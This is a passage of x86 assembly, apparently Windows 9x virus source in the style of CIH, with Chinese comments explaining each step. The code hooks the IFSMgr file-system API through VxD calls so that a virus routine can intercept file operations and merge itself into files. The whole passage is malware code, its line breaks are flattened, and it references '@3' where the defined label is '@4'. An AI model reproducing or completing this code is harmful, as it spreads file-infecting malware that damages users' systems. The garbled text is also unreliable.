CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ;* IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: ; 新的 IFSMgr_InstallFileSystemApiHook 功能调用 push ebx call @4; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook ; 获得当前指令的偏移地址 add ebx, FileSystemApiHook-@4 ; 加上偏移的差=FileSystemApiHook 的偏移 push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook ; 调用 VXD 移去指向 FileSystemApiHook 的钩子 IFSMgr_RemoveFileSystemApiHook =$ dd 00400068h ; Use EAX, ECX, EDX, and flags ; 调用号 pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] ; 调 用原来的 IFSMgr_InstallFileSystemApiHook 功能设置钩子 pop ecx
全文预览
